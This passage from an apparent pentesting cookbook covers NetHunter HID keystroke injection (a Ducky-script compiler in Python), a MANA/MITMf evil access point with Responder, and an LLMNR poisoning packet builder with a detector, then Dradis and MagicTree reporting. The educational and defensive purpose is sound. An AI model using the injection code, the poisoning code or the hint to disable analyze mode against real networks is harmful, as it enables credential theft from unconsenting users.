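RELEASE = bytes(8)   # all keys up

# Unshifted characters -> HID usage ID (US layout)
_PLAIN = {c: 0x04 + i for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
_PLAIN.update({c: 0x1E + i for i, c in enumerate("1234567890")})
_PLAIN.update({"\n": 0x28, "\t": 0x2B, " ": 0x2C, "-": 0x2D, "=": 0x2E, "[": 0x2F,
               "]": 0x30, "\\": 0x31, ";": 0x33, "'": 0x34, "`": 0x35, ",": 0x36,
               ".": 0x37, "/": 0x38})
# Characters that need Shift held, mapped to the unshifted key they live on
_SHIFTED = dict(zip('!@#$%^&*()_+{}|:"~<>?', '1234567890-=[]\\;\'`,./'))
_SHIFTED.update({c: c.lower() for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZ"})

# Ducky key names -> (modifier, usage ID)
_NAMED = {"ENTER": (0, 0x28), "ESCAPE": (0, 0x29), "ESC": (0, 0x29), "TAB": (0, 0x2B),
          "SPACE": (0, 0x2C), "DELETE": (0, 0x4C), "UP": (0, 0x52), "DOWN": (0, 0x51),
          "LEFT": (0, 0x50), "RIGHT": (0, 0x4F)}
_MODS = {"GUI": MOD_LGUI, "WINDOWS": MOD_LGUI, "CTRL": MOD_LCTRL, "CONTROL": MOD_LCTRL,
         "ALT": MOD_LALT, "SHIFT": MOD_LSHIFT}


def report(modifiers, usage):
    """One 8-byte boot-protocol keyboard report: modifiers, reserved, six key slots."""
    return bytes([modifiers, 0, usage, 0, 0, 0, 0, 0])


def char_to_report(ch):
    """Report that types one character, adding Left Shift where the layout needs it."""
    if ch in _PLAIN:
        return report(0, _PLAIN[ch])
    if ch in _SHIFTED:
        return report(MOD_LSHIFT, _PLAIN[_SHIFTED[ch]])
    raise ValueError("no US-layout key for %r" % ch)


def compile_ducky(script):
    """Return a list of ('report', bytes) / ('delay', ms) actions for the script."""
    actions = []

    def tap(rep):                      # key down, then key up
        actions.append(("report", rep))
        actions.append(("report", RELEASE))

    for raw in script.splitlines():
        line = raw.rstrip("\r\n").lstrip()
        if not line.strip() or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "STRING":
            for ch in arg:
                tap(char_to_report(ch))
        elif cmd in ("DELAY", "SLEEP"):   # NetHunter's preview uses SLEEP
            actions.append(("delay", int(arg)))
        elif cmd in _NAMED:
            tap(report(*_NAMED[cmd]))
        elif cmd in _MODS:                # e.g. "GUI r" opens the Run dialog
            mods, key = _MODS[cmd], 0
            name = arg.strip()
            if name.upper() in _NAMED:
                extra, key = _NAMED[name.upper()]
                mods |= extra
            elif name:
                key = _PLAIN[name.lower()]
            tap(report(mods, key))
        else:
            raise ValueError("unsupported Ducky command: %s" % line)
    return actions


def send(actions, device="/dev/hidg0", sleep=time.sleep):
    """Replay the actions on the gadget device (assumed path; not run by the test)."""
    with open(device, "wb", buffering=0) as hid:
        for kind, value in actions:
            if kind == "delay":
                sleep(value / 1000)
            else:
                hid.write(value)


SAMPLE_SCRIPT = """REM constructed sample, mirrors the NetHunter preset
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING Hello world!
ENTER
"""

if __name__ == "__main__":
    for action in compile_ducky(SAMPLE_SCRIPT):
        print(action)
```

Each character becomes a key-down report followed by an all-zero key-up report; leaving out the key-up is the classic bug that makes a typed "ll" come out as "l". Swapping _PLAIN and _SHIFTED for another layout is exactly what the Keyboard Layout option in NetHunter does for you.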





Setting up an evil access point 


The MANA toolkit is a rogue access point implementation created by SensePost, which can be used to perform Wi-Fi evil-AP and MITM attacks. Once a victim connects to our access point, we will be able to perform multiple actions, which you will learn about in this recipe.


How to do it... 


To set up an evil access point follow the given steps: 


1. It's easy to use. In the NetHunter menu, we choose Mana Wireless Toolkit:

[Screenshot: the NetHunter menu: ..., MAC Changer, VNC Manager, HID Attacks, DuckHunter HID, Bad USB MITM Attack, Mana Wireless Toolkit, MITM Framework, Nmap Scan, Metasploit Payload Generator, SearchSploit, Pineapple Connector, Wardriving]


2. It opens up in the General Settings tab. Here, we can choose the interface and other options, such as capturing cookies. This can be used in a wireless attack by pairing it with an evil twin access point on an external wireless card supported by NetHunter, so that the clients who join our access point are the ones whose traffic these plugins see:

[Screenshot: MITM Framework, General Settings tab. An Interface drop-down; checkboxes for JavaScript Keylogger, Enable Ferret-NG Cookie Capture Plugin, Browser Profiler, FilePWN (BDFPROXY), BeEF Autorun, SMB challenge-response auth attempts, SSLstrip+, an option unreadable in the screenshot, and Enable UpsideDownInternet; a ScreenShotter section with Enable ScreenShotter Plugin and Interval (in seconds) to screenshot]

3. You learned about Responder in the previous chapters. We can use Responder via this toolkit to capture network hashes.
4. First, we connect to the network we want to perform the attack on.

5. Next, we switch to the Responder Settings tab and check the attacks we wish to perform. We choose wlan0 as our interface:

[Screenshot: MITM Framework, Responder Settings tab. "Responder allows you to poison LLMNR, NBT-NS and MDNS requests." Checkboxes: Enable Responder Plugin, Enable Analyze, Fingerprint Host, an option unreadable in the screenshot, Enable NBTNS, WPAD Rogue Proxy Server, Enable Wredir]


6. To change the interface we want to listen on, we switch to the General Settings tab and choose from the drop-down list of interfaces:

[Screenshot: the General Settings tab again, with Interface set to wlan0 and the same plugin checkboxes]
7. Now we click on Start mitm attack in the options menu on the right-hand side.

8. We will see a terminal window open and our attack will be performed. We will see the host info as well as the password hashes captured by the attack:

[*] MITMf v0.9.7 online... initializing plugins
|_ Responder v0.2
  |_ NBT-NS, LLMNR & MDNS Responder v2.1.2 by Laurent Gaffie online
  |_ You can ICMP Redirect on this network. This workstation (192.168.110.19) is not on the same subnet than the DNS server (208.67.220.220)
  |_ You can ICMP Redirect on this network. This workstation (192.168.110.19) is not on the same subnet than the DNS server (208.67.222.222)
  |_ Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|_ Net-Creds v1.0 online
|_ DNSChef v0.4 online
|_ SMBserver online (Impacket 9.13)
2017-09-19 12:53:13 [SMBserver] Config file parsed
2017-09-19 12:53:13 [SMBserver] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2017-09-19 12:53:13 [SMBserver] Config file parsed
2017-09-19 12:53:28 [LLMNRPoisoner] 192.168.110.26 is looking for: printer
2017-09-19 12:53:28 [LLMNRPoisoner] 192.168.110.26 is looking for: printer
2017-09-19 12:53:29 [NBTNSPoisoner] 192.168.110.26 is looking for: PRINTER | Service requested: File Server Service | OS: Windows 10 Home 15063 | Client Version: Windows 10 Home 6.3
2017-09-19 12:53:29 [NBTNSPoisoner] 192.168.110.26 is looking for: PRINTER | Service requested is: File Server Service
2017-09-19 12:53:29 [NBTNSPoisoner] 192.168.110.26 is looking for: PRINTER | Service requested is: File Server Service

Note what the banner says: Responder is in analyze mode, so in this run the LLMNR and NBT-NS requests from 192.168.110.26 are only logged, not answered, and no hashes are captured. To actually poison the requests, so that the victim authenticates to our SMB server and leaks its NetNTLM challenge-response, Enable Analyze must be left unchecked on the Responder Settings tab.

9. Similarly, there are other attacks, such as Nmap scans, generating Metasploit payloads, and so on. 


For more information, visit https://github.com/offensive-security/kali-NetHunter/wiki. 
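The Responder plugin shown above works because Windows hosts fall back to LLMNR (multicast 224.0.0.252, UDP port 5355) when DNS cannot resolve a name, and anyone on the segment may answer. The following added example (not part of the book, of Responder or of MITMf) builds the query a victim sends for a mistyped file server name, builds the poisoned answer a poisoner returns for any name, parses both, and finishes with the detection logic a blue team can run over observed LLMNR responses: a single source answering for many different names. The packet layout follows RFC 4795 (LLMNR reuses the DNS message format); the packets and the sample log are constructed inline.

```python
"""LLMNR name resolution: the query a Windows host multicasts, the spoofed answer a
poisoner such as Responder sends back, and a detector for that behaviour.

Added example, not part of the original recipe, of Responder or of MITMf.
All packets and log events below are constructed inline.
"""
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
QTYPE_A, QCLASS_IN = 1, 1


def _encode_name(name):
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def _decode_name(buf, offset):
    labels = []
    while True:
        length = buf[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(buf[offset:offset + length].decode("ascii"))
        offset += length


def build_query(txid, name):
    """What a host sends to 224.0.0.252:5355 when DNS cannot resolve 'name'."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # flags 0: plain query
    return header + _encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def parse_query(pkt):
    txid, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if flags & 0x8000 or qdcount != 1:
        return None                          # a response, or not a simple query
    name, offset = _decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[offset:offset + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_poisoned_response(query_pkt, attacker_ip, ttl=30):
    """Answer ANY name with the attacker's address: this is what a poisoner does."""
    q = parse_query(query_pkt)
    if q is None or q["qtype"] != QTYPE_A:
        return None
    header = struct.pack("!HHHHHH", q["txid"], 0x8000, 1, 1, 0, 0)  # QR=1, one answer
    question = _encode_name(q["name"]) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    rdata = bytes(int(o) for o in attacker_ip.split("."))
    answer = _encode_name(q["name"]) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4) + rdata
    return header + question + answer


def parse_response(pkt):
    txid, flags, qdcount, ancount = struct.unpack("!HHHH", pkt[:8])
    if not flags & 0x8000 or ancount < 1:
        return None
    name, offset = _decode_name(pkt, 12)
    offset += 4                              # skip qtype/qclass of the question
    aname, offset = _decode_name(pkt, offset)
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[offset:offset + 10])
    rdata = pkt[offset + 10:offset + 10 + rdlen]
    return {"txid": txid, "name": aname, "ip": ".".join(str(b) for b in rdata), "ttl": ttl}


def find_poisoners(events, min_names=3):
    """Flag any source that answers LLMNR for many different names.

    events: (src_ip, resolved_name) pairs taken from LLMNR responses seen on
    the wire. A legitimate host only answers for its own name; a poisoner
    answers for everything it is asked (printer, fileserver, typo'd hostnames).
    """
    seen = {}
    for src, name in events:
        seen.setdefault(src, set()).add(name.lower())
    return sorted(src for src, names in seen.items() if len(names) >= min_names)


# Constructed traffic: a victim asks for a mistyped file server; the poisoner answers.
VICTIM_QUERY = build_query(0x1234, "fileservr")
POISONED = build_poisoned_response(VICTIM_QUERY, "192.168.110.19")
# Constructed response log: (responder IP, name it answered for)
RESPONSE_LOG = [("192.168.110.19", "printer"), ("192.168.110.19", "fileservr"),
                ("192.168.110.19", "wpad"), ("192.168.110.40", "ws-desk40")]

if __name__ == "__main__":
    print(parse_query(VICTIM_QUERY))
    print(parse_response(POISONED))
    print("suspected poisoners:", find_poisoners(RESPONSE_LOG))
```

The query and answer pair is the whole attack; what follows on the victim is an SMB or HTTP connection to the answering IP, where the NetNTLM challenge-response is captured. The defensive fix is to disable LLMNR and NBT-NS through Group Policy; find_poisoners() is the cheap check for whether someone is already doing this on a segment.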


Writing Reports 


In this chapter, we will cover the following recipes: 


e Generating reports using Dradis 
e Using MagicTree 


Introduction 


In this chapter, we will go through one of the most important steps of a pentesting project: the report. A good report must contain every detail of each vulnerability. Our aim is to keep it as detailed as possible, so that the right person in the organisation can understand all the details and address the issue with a proper fix.


There are different ways to create a pentesting report. In this chapter, you will learn a few tools that we 
can use to create a good report that covers everything in detail. 


Let's look at some of the key points that should always be included in the report:

Details of the vulnerability
The CVSS score
Impact of the bug on the organization
Recommendations to patch the bug

Common Vulnerability Scoring System (CVSS) is a standardized method for rating IT vulnerabilities and determining the urgency of a response. The base score is computed from the exploitability metrics (attack vector, attack complexity, privileges required, user interaction), the scope, and the confidentiality, integrity and availability impacts, and it should always be reported together with its vector string (for example CVSS:3.1/AV:N/AC:L/...), since the vector tells the reader why the number is what it is.

You can read more about CVSS at https://www.first.org/cvss.





Generating reports using Dradis 


Dradis is an open source browser-based application, which can be used to combine the output of different tools and generate a report. It is extremely easy to use and comes preinstalled with Kali. However, the packaged version may fail to start with errors, so we will install the current Community Edition from source and then learn how to use it.


How to do it... 


Following is the recipe for using Dradis: 


1. First, we need to install the dependencies by running the following commands:

apt-get install libsqlite3-dev
apt-get install libmariadbclient-dev-compat
apt-get install mariadb-client-10.1
apt-get install mariadb-server-10.1
apt-get install redis-server


2. We then use the following command:

| git clone https://github.com/dradis/dradis-ce.git

The following screenshot shows the output of the preceding command:

root@kali:~# git clone https://github.com/dradis/dradis-ce.git
Cloning into 'dradis-ce'...
remote: Counting objects: 7232, done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 7232 (delta 5), reused 3 (delta 0), pack-reused 7215
Receiving objects: 100% (7232/7232), 1.25 MiB | 1.01 MiB/s, done.
Resolving deltas: 100% (4716/4716), done.





3. Then, we change our directory: 


| cd dradis-ce/ 


4. Now we run the following command:

| bundle install --path PATH/TO/DRADIS/FOLDER

The following screenshot shows the output of the preceding command:

[Terminal output: bundle install enables the default add-ons, warns that the running Bundler (1.13.6) is older than the one that created the Gemfile.lock (1.15.3) and suggests upgrading with gem install bundler, then fetches the add-on repositories: dradis-calculator_cvss, dradis-calculator_dread, dradis-csv, dradis-html_export, dradis-acunetix, dradis-brakeman, ...]




5. We run this command: 


| ./bin/setup 


6. To start the server, we run this:

| bundle exec rails server

The following screenshot shows the output of the preceding command:

root@kali:~/dradis-ce# bundle exec rails server
=> Booting Thin
=> Rails 5.1.3 application starting in development on http://localhost:3000
=> Run `rails server -h` for more startup options
Thin web server (v1.6.3 codename Protein Powder)
Maximum connections set to 1024
Listening on localhost:3000, CTRL+C to stop





7. We can now access Dradis at http://localhost:3000 (plain HTTP; the development server listens on localhost only, which is what we want for a tool that will hold client findings).


8. Here, we set the shared password used to access the framework, and log in with it:

[Screenshot: "Configure the shared password. This server does not have a password yet, please set up one:" Password / Confirm Password / Set password and continue]

9. We will be redirected to the dashboard:

[Screenshot: the Dradis CE dashboard, with Upload output from tool, Export results and Configuration in the top bar, and a Project summary showing no issues and no methodologies in the project yet]


10. The Community Edition of Dradis ships with upload plugins for various tools such as Nmap, Acunetix, and Nikto.


11. Dradis allows us to create methodologies. A methodology can be considered a checklist, which can be used while performing a pentest activity for an organization:

[Screenshot: the Dradis CE sidebar, with Nodes and Methodologies entries]

12. To create a checklist, we go to Methodologies and click on Add new:

[Screenshot: "Add methodology to project", with a Name field (New checklist), the note "You can customize the name of this methodology. Useful if you need to add the same one multiple times (e.g. several apps in one project)", and Add to Project / Cancel buttons]

13. We then assign a name and click on Add to Project:

[Screenshot: the Basic checklists tab, with Edit and Delete buttons, showing Section #1 (Task #1.1, Task #1.2) and Section #2 (Task #2.1)]

14. We should now see a sample list created for us. We can edit it by clicking on the Edit button on the right-hand side:





Content

<?xml version="1.0"?>
<methodology>
  <name>Test checklist</name>
  <sections>
    <section>
      <name>Information Gathering</name>
      <tasks>
        <task>Perform Full Port Scan</task>
        <task>Run Nikto</task>
      </tasks>
    </section>
  </sections>
</methodology>





15. Here, we see that the list is stored as XML. We can edit it and save it by clicking on Update methodology:

[Screenshot: the Basic checklists tab now showing the Information Gathering section with the tasks Perform Full Port Scan and Run Nikto]

16. Now let's look at how we can organize our scan reports better. We go to the Nodes option in the left-hand side menu and click on the + sign; a pop-up box opens in which we can add a network range, and then we click on Add:

[Screenshot: "Add top-level node", with Add one / Add multiple radio buttons, a Label field and an Icon selector]

17. To add a new subnode, we select the node in the left-hand side pane and then choose the Add subnode option. This can be used to organize a network-based activity by the hosts' IP addresses.


18. Next, we can add notes and screenshots as PoC of the bugs we find:

[Screenshot: a node page with Host properties, Notes, Evidence and Attachments sections]


19. We can even import the results of various tools into Dradis. This is done by choosing Upload output from tool from the top menu:

Upload Manager
Use the form below to upload output files from other tools.

1. Choose a tool

Available plugins:
Dradis::Plugins::Acunetix
Dradis::Plugins::Brakeman
Dradis::Plugins::Burp
Dradis::Plugins::Metasploit
Dradis::Plugins::NTOSpider
Dradis::Plugins::Nessus
Dradis::Plugins::Nexpose
Dradis::Plugins::Nikto
Dradis::Plugins::Nmap
Dradis::Plugins::OpenVAS
Dradis::Plugins::Projects::Upload::Package
Dradis::Plugins::Projects::Upload::Template
Dradis::Plugins::Qualys
...
Dradis::Plugins::Zap


20. Here, we upload our output file. Dradis has built-in plugins, which can parse the reports of the different tools:

[Screenshot: Upload progress, "3. Output": Filename: C:\fakepath\hs.xml, Size: 5.89 KB]

21. Once the import is done, we will see the results in the left-hand side pane under the title plugin output:

[Screenshot: the Dradis CE Nodes tree, now containing a node for 10.11.1.31]


22. We can see the output of the scan results we just imported:

10.11.1.31

Services
name           port   product   protocol   reason    state   version
http           80               tcp        syn-ack   open
msrpc          135              tcp        syn-ack   open
netbios-ssn    139              tcp        syn-ack   open
microsoft-ds   445              tcp        syn-ack   open
NFS-or-IIS     1025             tcp        syn-ack   open
ms-sql-s       1433             tcp        syn-ack   open
ms-wbt-server  3389             tcp        syn-ack   open


23. Similarly, different scans can be imported, combined together, and exported as one single report using the Dradis framework:

[Screenshot: the Export Manager, with tabs for Export results in CSV format, Generate advanced HTML reports, Save and restore project information, Custom Word reports and Custom Excel reports. "Choose a template: Please choose one of the templates available for this plugin (find them in ./templates/reports/html_export)": basic.html.erb, default_dradis_template_v3.0.html.erb]

More information on Dradis can be found on the official website at https://dradisframework.com/.


Using MagicTree 


MagicTree is a data management and reporting tool similar to Dradis. It ships with Kali and organizes everything in a tree and node structure. It also allows us to execute commands and export the results as a report. In this recipe, we will look at some of the things we can do with MagicTree to ease our pentesting tasks.


How to do it... 


Following is the recipe for using MagicTree: 


1. We can run it from the Application menu.
2. We accept the terms and the application will open up: 


MagicTree License Agreement dialog: Please review and accept the license agreement to use MagicTree (Accept / Decline)


3. Next, we create a new node by going to Node | AutoCreate:

Node menu: Autocreate..., Create child, Delete, Add port...

4. In the box that opens, we type the IP address of the host we want to be added.
5. Once the node is added, it will appear in the left-hand side pane:

Tree View: magictree > testdata > netblock 192.168.2.0/24
6. To run a scan on a host, we go to the Table View; at the bottom, we will see an input box titled
Command:

Table View (Query/Method not saved in repository) with the Input, Command and User@Host fields and the Run and Save buttons
7. We will run an Nmap scan on the host we just added.
8. MagicTree allows you to query the data and send it to the shell. We click on the Q* button, and it
will automatically select the hosts for us:

Tree View: magictree > testdata > netblock 192.168.2.0/24 (selected by Q*)
9. Now we just need to type the following command:

    nmap -v -Pn -A -oX $results.xml $host

The following screenshot shows the output of the preceding command:

Input: 1 rows, 1 field(s): host; Command: nmap -v -Pn -A -oX $results.xml $host
10. Since hosts are already identified, we do not need to mention them here. Then, we click on Run:

Task Manager: State done, Title nmap -v -Pn -A -oX $results.xml $host, Exit Value 0
Host State FINISHED, Exit Value 0
Started: September 15, 2017 6:40:26 AM EDT
Finished: September 15, 2017 6:40:31 AM EDT

Completed NSE at 06:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.57 seconds
Raw packets sent: 1088 (50.954KB) | Rcvd: 2168 (95.256KB)
11. We will see a window that shows the scan being executed along with the output. Once the scan is 
complete, we can click on Import, and it will be imported into the tool. 

12. Similarly, we can run any other tool and import its report to MagicTree. We can generate a report by
navigating to Report | Generate Report...:

Report menu: Generate report...
13. In the next window, we can browse the list of templates we would like to use to save the report:

Look In: report-templates
base.docx, base.odt, example.mt, open-ports-and-summary-of-findings-by-host.docx, open-ports-and-summary-of-findings-by-host.odt, simple-test-log.docx, ...
File Name:
Files of Type: All Files

14. Then, we click on the Generate Report button, and we will see a report being generated:

Generate Report dialog (Generate Report / Cancel)

There's more... 


There are other tools that can be used for report generation, such as the following: 


• Serpico: https://github.com/SerpicoProject/Serpico
• Vulnreport: http://vulnreport.io/


